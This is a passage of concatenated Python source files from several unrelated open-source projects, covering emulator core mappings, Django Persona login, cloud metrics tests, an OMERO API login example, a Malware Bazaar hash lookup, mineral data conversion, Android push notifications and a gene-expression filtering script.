"Sony - PlayStation Portable": "Sony PlayStation Portable",
"Sony - PlayStation": "Sony PlayStation",
}
def getOpenVGDBToPhoenixMap(self):
return OrderedDict(sorted(self.openVGDBToPhoenixMap.items(), key=lambda t: t[0]))
openVGDBToPhoenixMap = {
"3DO Interactive Multiplayer": "Panasonic - 3DO Interactive Multiplayer",
"Arcade": "Arcade",
"Atari 2600": "Atari - 2600",
"Atari 5200": "Atari - 5200",
"Atari 7800": "Atari - 7800",
"Atari Jaguar CD": "Atari - Jaguar",
"Atari Jaguar": "Atari - Jaguar",
"Atari Lynx": "Atari - Lynx",
"Bandai WonderSwan Color": "Bandai - WonderSwan Color",
"Bandai WonderSwan": "Bandai - WonderSwan",
"Coleco ColecoVision": "Coleco - ColecoVision",
"GCE Vectrex": "GCE - Vectrex",
"Intellivision": "Mattel - Intellivision",
"Magnavox Odyssey2": "Magnavox - Odyssey2",
"NEC PC Engine CD/TurboGrafx-CD": "NEC - PC Engine CD - TurboGrafx-CD",
"NEC PC Engine/TurboGrafx-16": "NEC - PC Engine - TurboGrafx 16",
"NEC PC-FX": "NEC - PC-FX - PC-FXGA",
"NEC SuperGrafx": "NEC - Super Grafx",
"Nintendo 64": "Nintendo - Nintendo 64",
"Nintendo DS": "Nintendo - Nintendo DS",
"Nintendo Entertainment System": "Nintendo - Nintendo Entertainment System",
"Nintendo Famicom Disk System": "Nintendo - Nintendo Entertainment System",
"Nintendo Game Boy Advance": "Nintendo - Game Boy Advance",
"Nintendo Game Boy Color": "Nintendo - Game Boy Color",
"Nintendo Game Boy": "Nintendo - Game Boy",
"Nintendo GameCube": "Nintendo - GameCube",
"Nintendo Super Nintendo Entertainment System": "Nintendo - Super Nintendo Entertainment System",
"Nintendo Virtual Boy": "Nintendo - Virtual Boy",
"Nintendo Wii": "Nintendo - Wii",
"Sega 32X": "Sega - 32X",
"Sega CD/Mega-CD": "Sega - Mega-CD",
"Sega Game Gear": "Sega - Game Gear",
"Sega Genesis/Mega Drive": "Sega - Mega Drive - Genesis",
"Sega Master System": "Sega - Master System - Mark III",
"Sega Saturn": "Sega - Saturn",
"Sega SG-1000": "Sega - SG-1000",
"SNK Neo Geo Pocket Color": "SNK - Neo Geo Pocket Color",
"SNK Neo Geo Pocket": "SNK - Neo Geo Pocket",
"Sony PlayStation Portable": "Sony - PlayStation Portable",
"Sony PlayStation": "Sony - PlayStation",
}
def filterUnusedCores(self):
for key in self.coreInfo["cores"].keys():
if (
# No reason specified
#"4do_libretro" == key
# or "81_libretro" == key
# or "bluemsx_libretro" == key
# or "bsnes_accuracy_libretro" == key
# or "bsnes_balanced_libretro" == key
# or "bsnes_performance_libretro" == key
# or "cap32_libretro" == key
# or "catsfc_libretro" == key
# or "dosbox_libretro" == key
# or "emux_chip8_libretro" == key
# or "fb_alpha_cps1_libretro" == key
# or "fb_alpha_cps2_libretro" == key
# or "fmsx_libretro" == key
# or "gpsp_libretro" == key
# or "gw_libretro" == key
# or "handy_libretro" == key
# or "hatari_libretro" == key
# or "imame4all_libretro" == key
# or "mame078_libretro" == key
# or "mame2010_libretro" == key
# or "mame2014_libretro" == key
# or "meteor_libretro" == key
# or "o2em_libretro" == key
# or "prosystem_libretro" == key
# or "puae_libretro" == key
# or "ume2014_libretro" == key
# or "vecx_libretro" == key
# or "virtualjaguar_libretro" == key
# ARM cores
"pcsx" in key
or "pocketsnes_libretro" == key
):
del self.coreInfo["cores"][key]
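# Illustrative sketch (commented out, and not part of the original updater
# set): how a concrete updater is expected to extend SqlTableUpdater. The
# table name, columns, and the SqlDatabase constructor call are assumptions,
# not taken from this project.
#
# class ExampleSystemUpdater(SqlTableUpdater):
#     def __init__(self, coreInfo=None):
#         columns = (("name", "TEXT"), ("enabled", "INTEGER"))
#         SqlTableUpdater.__init__(self, "example", columns, coreInfo)
#
#     def updateTable(self):
#         db = SqlDatabase(self.dbFile)  # hypothetical constructor signature
#         self.updateColumns(db)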
|
thomec/tango
|
accounts/authentication.py
|
# accounts/authentication.py
import requests
import logging
from django.conf import settings
from django.contrib.auth import get_user_model
logger = logging.getLogger(__name__)
User = get_user_model()
PERSONA_VERIFY_URL = 'https://verifier.login.persona.org/verify'
#DOMAIN = 'localhost'
#DOMAIN = 'http://hotzenplotz.pythonanywhere.com'
class PersonaAuthenticationBackend(object):
def authenticate(self, assertion):
        logger.warning('entering authenticate function')
response = requests.post(
PERSONA_VERIFY_URL,
data = {'assertion': assertion, 'audience': settings.DOMAIN}
)
        logger.warning('got response from persona')
        logger.warning(response.content.decode())
if response.ok and response.json()['status'] == 'okay':
email = response.json()['email']
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return User.objects.create(email=email)
else:
logger.warning(
'Persona says no. Json was: {}'.format(response.json())
)
def get_user(self, email):
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return None
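# Minimal wiring sketch (an assumption, not shown elsewhere in this file):
# the backend is enabled in settings.py via its dotted path, e.g.
#
#   AUTHENTICATION_BACKENDS = [
#       'accounts.authentication.PersonaAuthenticationBackend',
#   ]
#
# Django then tries authenticate(assertion=...) at login time and calls
# get_user() with the stored user key (here, the email) on later requests.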
|
anurag03/integration_tests
|
cfme/tests/candu/test_utilization_metrics.py
|
# -*- coding: utf-8 -*-
import random
from operator import attrgetter
import pytest
from cfme import test_requirements
from cfme.cloud.provider import CloudProvider
from cfme.cloud.provider.azure import AzureProvider
from cfme.cloud.provider.ec2 import EC2Provider
from cfme.cloud.provider.gce import GCEProvider
from cfme.cloud.provider.openstack import OpenStackProvider
from cfme.common.provider import BaseProvider
from cfme.infrastructure.provider.rhevm import RHEVMProvider
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from cfme.utils import conf
from cfme.utils.blockers import BZ
from cfme.utils.log import logger
from cfme.utils.wait import wait_for
from cfme.fixtures.provider import setup_or_skip
pytestmark = [
pytest.mark.tier(1),
test_requirements.c_and_u,
pytest.mark.provider(
[VMwareProvider, RHEVMProvider, EC2Provider, OpenStackProvider, AzureProvider, GCEProvider],
required_fields=[(['cap_and_util', 'capandu_vm'], 'cu-24x7')], scope="module")
]
@pytest.fixture(scope="module")
def clean_setup_provider(request, provider):
BaseProvider.clear_providers()
setup_or_skip(request, provider)
yield
BaseProvider.clear_providers()
def vm_count(appliance, metrics_tbl, mgmt_system_id):
return bool(appliance.db.client.session.query(metrics_tbl).filter(
metrics_tbl.parent_ems_id == mgmt_system_id).filter(
metrics_tbl.resource_type == "VmOrTemplate").count()
)
def host_count(appliance, metrics_tbl, mgmt_system_id):
return bool(appliance.db.client.session.query(metrics_tbl).filter(
metrics_tbl.parent_ems_id == mgmt_system_id).filter(
metrics_tbl.resource_type == "Host").count()
)
@pytest.fixture(scope="module")
def metrics_collection(appliance, clean_setup_provider, provider, enable_candu):
"""Check the db is gathering collection data for the given provider.
Metadata:
test_flag: metrics_collection
"""
metrics_tbl = appliance.db.client['metrics']
mgmt_systems_tbl = appliance.db.client['ext_management_systems']
logger.info("Fetching provider ID for %s", provider.key)
mgmt_system_id = appliance.db.client.session.query(mgmt_systems_tbl).filter(
mgmt_systems_tbl.name == conf.cfme_data.get('management_systems', {})[provider.key]['name']
).first().id
logger.info("ID fetched; testing metrics collection now")
    # VMs exist for both infra and cloud providers
wait_for(
vm_count, [appliance, metrics_tbl, mgmt_system_id],
delay=20,
timeout=1500,
fail_condition=False,
message="wait for VMs")
    # hosts exist only for infra providers
if provider.category == "infra":
wait_for(
            host_count, [appliance, metrics_tbl, mgmt_system_id],
delay=20,
timeout=1500,
fail_condition=False,
message="wait for hosts.")
def get_host_name(provider):
cfme_host = random.choice(provider.data["hosts"])
return cfme_host.name
def query_metric_db(appliance, provider, metric, vm_name=None, host_name=None):
metrics_tbl = appliance.db.client['metrics']
ems = appliance.db.client['ext_management_systems']
    if vm_name is not None:
        object_name = vm_name
    elif host_name is not None:
        object_name = host_name
with appliance.db.client.transaction:
provs = (
appliance.db.client.session.query(metrics_tbl.id)
.join(ems, metrics_tbl.parent_ems_id == ems.id)
.filter(metrics_tbl.resource_name == object_name,
ems.name == provider.name)
)
return appliance.db.client.session.query(metrics_tbl).filter(
metrics_tbl.id.in_(provs.subquery()))
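# Illustrative calls (both the VM and host tests pass the resource name
# through the same positional slot, so it arrives here as vm_name; 'cu-24x7'
# is the capandu_vm name required by this module's provider setup):
#   query_metric_db(appliance, provider, 'net_usage_rate_average', 'cu-24x7')
#   query_metric_db(appliance, provider, 'net_usage_rate_average',
#                   host_name=get_host_name(provider))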
@pytest.mark.rhv2
# Tests to check that specific metrics are being collected
@pytest.mark.meta(
blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_cpu(metrics_collection, appliance, provider):
vm_name = provider.data['cap_and_util']['capandu_vm']
if provider.category == "infra":
query = query_metric_db(appliance, provider, 'cpu_usagemhz_rate_average',
vm_name)
average_rate = attrgetter('cpu_usagemhz_rate_average')
elif provider.category == "cloud":
query = query_metric_db(appliance, provider, 'cpu_usage_rate_average',
vm_name)
average_rate = attrgetter('cpu_usage_rate_average')
for record in query:
if average_rate(record) is not None:
assert average_rate(record) > 0, 'Zero VM CPU Usage'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(EC2Provider) or provider.one_of(GCEProvider))
def test_raw_metric_vm_memory(metrics_collection, appliance, provider):
vm_name = provider.data['cap_and_util']['capandu_vm']
if provider.type == 'azure':
query = query_metric_db(appliance, provider, 'mem_usage_absolute_average',
vm_name)
average_rate = attrgetter('mem_usage_absolute_average')
else:
query = query_metric_db(appliance, provider, 'derived_memory_used',
vm_name)
average_rate = attrgetter('derived_memory_used')
for record in query:
if average_rate(record) is not None:
assert average_rate(record) > 0, 'Zero VM Memory Usage'
break
@pytest.mark.rhv2
@pytest.mark.meta(
blockers=[BZ(1408963, forced_streams=["5.8", "upstream"],
unblock=lambda provider: not provider.one_of(RHEVMProvider))]
)
@pytest.mark.meta(
blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_network(metrics_collection, appliance, provider):
vm_name = provider.data['cap_and_util']['capandu_vm']
query = query_metric_db(appliance, provider, 'net_usage_rate_average',
vm_name)
for record in query:
if record.net_usage_rate_average is not None:
assert record.net_usage_rate_average > 0, 'Zero VM Network IO'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(EC2Provider))
@pytest.mark.meta(
blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_disk(metrics_collection, appliance, provider):
vm_name = provider.data['cap_and_util']['capandu_vm']
query = query_metric_db(appliance, provider, 'disk_usage_rate_average',
vm_name)
for record in query:
if record.disk_usage_rate_average is not None:
assert record.disk_usage_rate_average > 0, 'Zero VM Disk IO'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_cpu(metrics_collection, appliance, provider):
host_name = get_host_name(provider)
query = query_metric_db(appliance, provider, 'cpu_usagemhz_rate_average',
host_name)
for record in query:
if record.cpu_usagemhz_rate_average is not None:
assert record.cpu_usagemhz_rate_average > 0, 'Zero Host CPU Usage'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_memory(metrics_collection, appliance, provider):
host_name = get_host_name(provider)
query = query_metric_db(appliance, provider, 'derived_memory_used',
host_name)
for record in query:
if record.derived_memory_used is not None:
assert record.derived_memory_used > 0, 'Zero Host Memory Usage'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_network(metrics_collection, appliance, provider):
host_name = get_host_name(provider)
query = query_metric_db(appliance, provider, 'net_usage_rate_average',
host_name)
for record in query:
if record.net_usage_rate_average is not None:
assert record.net_usage_rate_average > 0, 'Zero Host Network IO'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(CloudProvider))
@pytest.mark.meta(
blockers=[BZ(1424589, forced_streams=["5.8", "5.9", "upstream"],
unblock=lambda provider: not provider.one_of(RHEVMProvider))]
)
def test_raw_metric_host_disk(metrics_collection, appliance, provider):
host_name = get_host_name(provider)
query = query_metric_db(appliance, provider, 'disk_usage_rate_average',
host_name)
for record in query:
if record.disk_usage_rate_average is not None:
assert record.disk_usage_rate_average > 0, 'Zero Host Disk IO'
break
|
jburel/openmicroscopy
|
examples/Training/python/Json_Api/Login.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016-2017 University of Dundee & Open Microscopy Environment.
# All Rights Reserved.
# Use is subject to license terms supplied in LICENSE.txt
#
import requests
from Parse_OMERO_Properties import USERNAME, PASSWORD, OMERO_WEB_HOST, \
SERVER_NAME
session = requests.Session()
# Start by getting supported versions from the base url...
api_url = '%s/api/' % OMERO_WEB_HOST
print "Starting at:", api_url
r = session.get(api_url)
# we get a list of versions
versions = r.json()['data']
# use most recent version...
version = versions[-1]
# get the 'base' url
base_url = version['url:base']
r = session.get(base_url)
# which lists a bunch of urls as starting points
urls = r.json()
servers_url = urls['url:servers']
login_url = urls['url:login']
projects_url = urls['url:projects']
save_url = urls['url:save']
schema_url = urls['url:schema']
# To login we need to get CSRF token
token_url = urls['url:token']
token = session.get(token_url).json()['data']
print 'CSRF token', token
# We add this to our session header
# Needed for all POST, PUT, DELETE requests
session.headers.update({'X-CSRFToken': token,
'Referer': login_url})
# List the servers available to connect to
servers = session.get(servers_url).json()['data']
print 'Servers:'
for s in servers:
print '-id:', s['id']
print ' name:', s['server']
print ' host:', s['host']
print ' port:', s['port']
# find one called SERVER_NAME
servers = [s for s in servers if s['server'] == SERVER_NAME]
if len(servers) < 1:
raise Exception("Found no server called '%s'" % SERVER_NAME)
server = servers[0]
# Login with username, password and token
payload = {'username': USERNAME,
'password': PASSWORD,
# 'csrfmiddlewaretoken': token, # Using CSRFToken in header instead
'server': server['id']}
r = session.post(login_url, data=payload)
login_rsp = r.json()
assert r.status_code == 200
assert login_rsp['success']
eventContext = login_rsp['eventContext']
print 'eventContext', eventContext
# Can get our 'default' group
groupId = eventContext['groupId']
# With successful login, request.session will contain
# OMERO session details and reconnect to OMERO on
# each subsequent call...
# List projects:
# Limit number of projects per page
payload = {'limit': 2}
data = session.get(projects_url, params=payload).json()
assert len(data['data']) < 3
print "Projects:"
for p in data['data']:
print ' ', p['@id'], p['Name']
# Create a project:
projType = schema_url + '#Project'
# Need to specify target group
url = save_url + '?group=' + str(groupId)
r = session.post(url, json={'Name': 'API TEST foo', '@type': projType})
assert r.status_code == 201
project = r.json()['data']
project_id = project['@id']
print 'Created Project:', project_id, project['Name']
# Get project by ID
project_url = projects_url + str(project_id) + '/'
r = session.get(project_url)
project = r.json()
print project
# Update a project
project['Name'] = 'API test updated'
r = session.put(save_url, json=project)
# Delete a project:
r = session.delete(project_url)
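# Optional follow-up check (illustrative): after the DELETE above, fetching
# the project again is expected to fail (typically a 404 status).
r = session.get(project_url)
print 'After delete, GET status:', r.status_code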
|
slaughterjames/static
|
modules/malware_bazaar_search.py
|
#python imports
import sys
import os
import time
import datetime
import subprocess
import json
import requests
from termcolor import colored
#third-party imports
#No third-party imports
#programmer generated imports
from logger import logger
from fileio import fileio
'''
***BEGIN DESCRIPTION***
Type: Search - Description: Searches for any available data on a target against the Abuse.ch Malware Bazaar database.
***END DESCRIPTION***
'''
def POE(POE):
if (POE.logging == True):
LOG = logger()
newlogentry = ''
reputation_dump = ''
reputation_output_data = ''
malwarebazaar = ''
if (POE.logging == True):
newlogentry = 'Module: malware_bazaar_search'
LOG.WriteStrongLog(POE.logdir, POE.targetfilename, newlogentry)
    if (POE.SHA256 == ''):
        print (colored('\r\n[x] Unable to execute Malware Bazaar Search - hash value must be SHA256.', 'red', attrs=['bold']))
        if (POE.logging == True):
            newlogentry = 'Unable to execute Malware Bazaar Search - hash value must be SHA256'
            LOG.WriteStrongSubLog(POE.logdir, POE.targetfilename, newlogentry)
        return -1
query_status = ''
first_seen = ''
last_seen = ''
signature = ''
sig_count = 0
output = POE.logdir + 'MalwareBazaarSearch.json'
FI = fileio()
print (colored('\r\n[*] Running abuse.ch Malware Bazaar Search against: ' + POE.target, 'white', attrs=['bold']))
malwarebazaar = "https://mb-api.abuse.ch/api/v1/" #API URL
data = { #Our header params
'query': 'get_info',
'hash': POE.SHA256,
}
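    # For reference, a successful reply is JSON shaped roughly like this
    # (field values are illustrative, not real sample data):
    #   {"query_status": "ok",
    #    "data": [{"first_seen": "...", "last_seen": "...",
    #              "signature": "...", ...}]}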
response_dump = requests.post(malwarebazaar, data=data, timeout=15) # Give us the results as JSON
if (POE.debug == True):
print (response_dump)
try:
FI.WriteLogFile(output, response_dump.content.decode("utf-8", "ignore"))
        print (colored('[*] Malware Bazaar data has been written to file here: ', 'green') + colored(output, 'blue', attrs=['bold']))
if ((POE.logging == True) and (POE.nolinksummary == False)):
newlogentry = 'Malware Bazaar data has been generated to file here: <a href=\"' + output + '\"> Malware Bazaar Host Output </a>'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
except:
print (colored('[x] Unable to write Malware Bazaar data to file', 'red', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'Unable to write Malware Bazaar data to file'
LOG.WriteStrongSubLog(POE.logdir, POE.targetfilename, newlogentry)
POE.csv_line += 'N/A,'
return -1
try:
#Open the file we just downloaded
print ('[-] Reading Malware Bazaar file: ' + output.strip())
        with open(output.strip(), 'rb') as read_file:
            data = json.load(read_file, cls=None)
# Check what kind of results we have
query_status = data["query_status"]
print ('[*] query_status: ' + query_status)
if (query_status == 'ok'):
with open(output.strip(), 'r') as read_file:
for string in read_file:
if (POE.debug == True):
print ('[DEBUG] string: ' + string.strip())
if ('first_seen' in string):
first_seen = string.strip()
if ('last_seen' in string):
last_seen = string.strip()
if (('signature' in string) and (sig_count == 0)):
signature = string.strip()
sig_count += 1
print ('[*] Sample ' + first_seen.replace(',',''))
print ('[*] Sample ' + last_seen.replace(',',''))
print ('[*] Sample ' + signature.replace(',',''))
if (POE.logging == True):
newlogentry = 'Sample ' + first_seen.replace(',','')
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
newlogentry = 'Sample ' + last_seen.replace(',','')
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
newlogentry = 'Sample ' + signature.replace(',','')
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
#Can't find anything on this one...
elif (query_status == 'hash_not_found'):
print (colored('[-] The hash value has not been found...', 'yellow', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'No results available for host...'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
#Can't find anything on this one...
elif (query_status == 'no_results'):
print (colored('[-] No results available for host...', 'yellow', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'No results available for host...'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
#Something weird happened...
else:
print (colored('[x] An error has occurred...', 'red', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'An error has occurred...'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
    except Exception as e:
        print (colored('[x] Error: ' + str(e) + ' Terminating...', 'red', attrs=['bold']))
        return -1
    return 0
|
QuLogic/burnman
|
burnman/data/input_raw_endmember_datasets/HHPH2013data_to_burnman.py
|
# BurnMan - a lower mantle toolkit
# Copyright (C) 2012-2014, Myhill, R., Heister, T., Unterborn, C., Rose, I. and Cottaar, S.
# Released under GPL v2 or later.
# This is a standalone program that converts a tabulated version of the Stixrude and Lithgow-Bertelloni data format into the standard burnman format (printed to stdout)
import sys
def read_dataset(datafile):
f=open(datafile,'r')
ds=[]
for line in f:
ds.append(line.decode('utf-8').split())
return ds
ds=read_dataset('HHPH2013_endmembers.dat')
print '# BurnMan - a lower mantle toolkit'
print '# Copyright (C) 2012, 2013, Heister, T., Unterborn, C., Rose, I. and Cottaar, S.'
print '# Released under GPL v2 or later.'
print ''
print '"""'
print 'HHPH_2013'
print 'Minerals from Holland et al 2013 and references therein'
print 'The values in this document are all in S.I. units,'
print 'unlike those in the original paper'
print 'File autogenerated using HHPH2013data_to_burnman.py'
print '"""'
print ''
print 'from burnman.mineral import Mineral'
print 'from burnman.solidsolution import SolidSolution'
print 'from burnman.solutionmodel import *'
print 'from burnman.processchemistry import read_masses, dictionarize_formula, formula_mass'
print ''
print 'atomic_masses=read_masses()'
print ''
print '"""'
print 'ENDMEMBERS'
print '"""'
print ''
param_scales = [ -1., -1., #not numbers, so we won't scale
1.e3, 1.e3, #kJ -> J
1.0, # J/K/mol
1.e-5, # kJ/kbar/mol -> m^3/mol
1.e3, 1.e-2, 1.e3, 1.e3, # kJ -> J and table conversion for b
1.e-5, # table conversion
1.e8, # kbar -> Pa
1.0, # no scale for K'0
1.e-8] #GPa -> Pa # no scale for eta_s
formula='0'
for idx, m in enumerate(ds):
if idx == 0:
param_names=m
else:
print 'class', m[0].lower(), '(Mineral):'
print ' def __init__(self):'
print ''.join([' formula=\'',m[1],'\''])
print ' formula = dictionarize_formula(formula)'
print ' self.params = {'
print ''.join([' \'name\': \'', m[0], '\','])
print ' \'formula\': formula,'
print ' \'equation_of_state\': \'hp_tmt\','
for pid, param in enumerate(m):
if pid > 1 and pid != 3 and pid<6:
print ' \''+param_names[pid]+'\':', float(param)*param_scales[pid], ','
print ' \'Cp\':', [round(float(m[i])*param_scales[i],10) for i in [6, 7, 8, 9]], ','
for pid, param in enumerate(m):
if pid > 9:
print ' \''+param_names[pid]+'\':', float(param)*param_scales[pid], ','
print ' \'n\': sum(formula.values()),'
print ' \'molar_mass\': formula_mass(formula, atomic_masses)}'
print ''
print ' self.uncertainties = {'
print ' \''+param_names[3]+'\':', float(m[3])*param_scales[3], '}'
print ' Mineral.__init__(self)'
print ''
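# For orientation, each data row above is emitted as a class definition of
# roughly this shape (the name and formula below are placeholders, not values
# read from the dataset file):
#
# class fo (Mineral):
#     def __init__(self):
#         formula='Mg2SiO4'
#         ...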
|
LPgenerator/django-db-mailer
|
dbmail/providers/google/android.py
|
# -*- encoding: utf-8 -*-
try:
from httplib import HTTPSConnection
from urlparse import urlparse
except ImportError:
from http.client import HTTPSConnection
from urllib.parse import urlparse
from json import dumps, loads
from django.conf import settings
class GCMError(Exception):
pass
def send(user, message, **kwargs):
"""
Site: https://developers.google.com
API: https://developers.google.com/cloud-messaging/
Desc: Android notifications
"""
headers = {
"Content-type": "application/json",
"Authorization": "key=" + kwargs.pop("gcm_key", settings.GCM_KEY)
}
hook_url = 'https://android.googleapis.com/gcm/send'
data = {
"registration_ids": [user],
"data": {
"title": kwargs.pop("event"),
'message': message,
}
}
data['data'].update(kwargs)
up = urlparse(hook_url)
http = HTTPSConnection(up.netloc)
http.request(
"POST", up.path,
headers=headers,
body=dumps(data))
response = http.getresponse()
if response.status != 200:
raise GCMError(response.reason)
body = response.read()
if loads(body).get("failure") > 0:
raise GCMError(repr(body))
return True
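# Illustrative call (the registration token and event name are placeholders):
#
#   send('device-registration-token', 'Build finished', event='CI status')
#
# Extra keyword arguments are merged into the GCM "data" payload, and a
# per-call "gcm_key" kwarg overrides settings.GCM_KEY.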
|
ejspina/Gene_expression_tools
|
Python/FilterByID_dict_parse.py
|
#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Eli
#
# Created: 06/04/2014
# Copyright: (c) Eli 2014
# Licence: <your licence>
#-------------------------------------------------------------------------------
def main():
pass
if __name__ == '__main__':
main()
import sys
#This script filters a data file by id's listed one per line in another file
ids = open("C:/rnaseq/mirna_data/clusters/10rep_redo_deseq-edger/DEseq2_1cpm3redo_nopara2_logFCall.txt", "r")
#Take header from ID file & initialize empty dict
head_ids = ids.readline().strip("\n")
idlist1 = {}
#id_count = 0
#Make dict of ID's (key) & selected variables/annotations (values)
for line in ids:
name = line.strip('\n').split('\t')[0]
#name = name[4:]
#if len(name.split('-')) > 3:
# name = '-'.join(name.split('-')[1:])
#arm = name.split('-')[-1]
#name = '-'.join(['-'.join(name.split('-')[0:2]), arm])
    #remove the 'cin-' prefix, if present
    if name.startswith('cin-'):
        name = name[len('cin-'):]
#print name
#name = name[-5:]
#values = '\t'.join(line.strip('\n').split('\t')[1:3])
values = '\t'.join(line.strip('\n').split('\t')[1:4])
#if "ENSCINP" in values:
# values2 = values[7:]
# values = "ENSCINT" + values2
#values = '\t'.join(line.strip('\n').split('\t')[2:])
#values = values[0:-3]
if name in idlist1 and len(name) > 0:
if values in idlist1[name]:
continue
else:
idlist1[name].append(values)
elif len(name) > 0:
idlist1[name] = [values]
#id_count+=1
#if id_count%1000==0:
# print id_count
ids.close()
#Debugging code below:
#print 'idlist1:', len(idlist1)
#sorted(idlist1)
#print idlist1
#idlist1 = ['miR-216'] #debugging override; leave disabled so the dict above is used
data = open("C:/rnaseq/coexpression/mirna-mrna/logfc_pearson/1cpm3_5rpkm3_redo2_edger_logfcValues_pearson_targetscan_deseq2logfc_mirs2.txt", "r")
#Output merged header & initialize retrieved list + row counter
#sys.stdout.write("LogFC.consensus" + '\t' + data.readline())
#sys.stdout.write("LogFC.consensus" + '\t' + '\t'.join(data.readline().split('\t')[0:3]) + '\n')
#sys.stdout.write(data.readline())
#data.readline()
matched = 0
idlist2 = {}
out = 0
#Match ID's between lists and return associated variables
for line in data:
#print line
name = line.strip('\n').split('\t')[6]
#print name
#name = name.split('|')[3].split('.')[0] # for first ID from BLAST target
#name = name[0:7]
#if name[-1].isalpha():
# name = name[0:-1]
#print name
#variables = line.strip('\n').split('\t')[5,9,10]
#idlist2[name] = line.split('\t')[1]
descr = line.strip('\n').split('\t')[1]
#if "," in descr:
# descr = descr.split(',')[0]
#name = line[1:20] # for trimmed encin gene name
#kh = '.'.join(line.split('\t')[1].split(':')[1].split('.')[0:4])
#Loop through input dict ID's and search for "name" in associated variables
#for item in idlist1: #Loop through keys (refseq)
    if name in idlist1: #match primary ID's
        #for item in idlist1[name].split(' '):
        sys.stdout.write('\t'.join(idlist1[name]) + '\t' + line)
#EXCHANGE ID'S BUT KEEP REST OF LINE/DESCRIPTION
# sys.stdout.write(descr + '\t' + '\t'.join(idlist1[name]) + '\n')
#else:
# sys.stdout.write(descr + '\t' + name + '\n')
#print idlist1[name]
#sys.stdout.write(line.strip('\n') + '\t' + '\t'.join(idlist1[name]) + '\n')
#continue
#matched +=1
else:
sys.stdout.write(line)
#if name in idlist1[item]: #Check for each ID in the name variable
# idlist2[name] = variables
# values = idlist1[item]
# stop = 1
#while stop <= len(values):
# if descr in idlist1[name]:
# sys.stdout.write(line)
# out+=1
#print out
#Return items in matched list (idlist2) using associations from idlist1
#for mir in idlist1:
# if mir in idlist2:
# sys.stdout.write(mir + '\t' + '\t'.join(idlist2[mir]) + '\n')
# for mrna in idlist1[mir]:
# if mrna in idlist2:
# sys.stdout.write(mrna+ '\t' + '\t'.join(idlist2[mrna]) + '\n')
#if len(idlist1[name]) > 1:
# for value in idlist1[name]: #Print all values on separate lines
# sys.stdout.write(value + '\t' + line)
#sys.stdout.write(descr + '\t' + value + '\t' + name + '\t' + '\t'.join(variables) + '\n')
# sys.stdout.write(value + '\t' + '\t'.join(line.split('\t')[0:]))
#sys.stdout.write(value + '\t' + '\t'.join(line.split('\t')[0:3]) + '\n')
# out+=1
#else:
# sys.stdout.write('\t'.join(idlist1[name]) + '\t' + line)
#sys.stdout.write(descr + '\t' + ".\t".join(idlist1[name]) + '\t' + name + '\t' + '\t'.join(variables) + '\n')
#print idlist1[name]
# sys.stdout.write(('\t'.join(idlist1[name]) + '\t' + '\t'.join(line.split('\t')[0:])))
#sys.stdout.write(name + '\t' + '\t'.join(idlist1[name]) + '\t' + '\t'.join(line.split('\t')[2:]))
# out+=1
#print matched, out
#print gene
#print idlist1[item]
# sys.stdout.write(value + "\t" + name + '\t' + line)#'\t' + '\t'.join(line.split('\t')[2:]))
# stop+=1
#continue
#if name in idlist1:
# if descr in idlist1[name]:
# sys.stdout.write(line)
# descr = idlist1[name]
# sys.stdout.write('\t'.join(idlist1[name]) + '\t' + '\t'.join(line.split('\t')[2:]))
#sys.stdout.write('\t'.join(line.split('\t')[0:2]) + '\t' + descr + '\n')
#del idlist1[name]
#else:
# pass
#sys.stdout.write(line + '\n')
#if name in idlist2:
# pass
#else:
#idlist2.append(name)
#idlist1.remove(name)
#print line
#count+=1
#Code for checking remaining values in ID list
#for item in idlist1:
# print "bakow!"
# sys.stdout.write(item + '\t' + idlist2[item] + '\t' + idlist1[item] + '\n')
#else:
# print line.split('\t')[0]
#print len(idlist1), len(idlist2)
#print len(idlist1)-len(idlist2)
#print len(idlist1)
#sorted(idlist2)
#print idlist1
#for item in idlist2:
# if item in idlist1:
# idlist1.remove(item)
#print 'idlist1-idlist2', len(idlist1)
#for item in idlist1:
# print item
#cross check input and output lists
#idlist3= []
#for thing in idlist1:
# if thing in idlist2:
# pass
# else:
# idlist3.append(thing)
#print len(idlist3)
#print len(idlist4)
#idlist4 = [x for x in idlist1 if x not in idlist2]
|
underdogio/tld
|
src/tld/update.py
|
"""
Deprecated. Use ``update-tld-names`` command instead.
"""
from __future__ import print_function
__title__ = 'tld.update'
__author__ = 'Artur Barseghyan'
__copyright__ = '2013-2015 Artur Barseghyan'
__license__ = 'GPL 2.0/LGPL 2.1'
from tld.utils import update_tld_names
_ = lambda x: x
if __name__ == '__main__':
update_tld_names()
print(_("Local TLD names file has been successfully updated!"))
|
saloni10/librehatti_new
|
src/authentication/models.py
|
from django.db import models
from django.contrib.auth.models import User
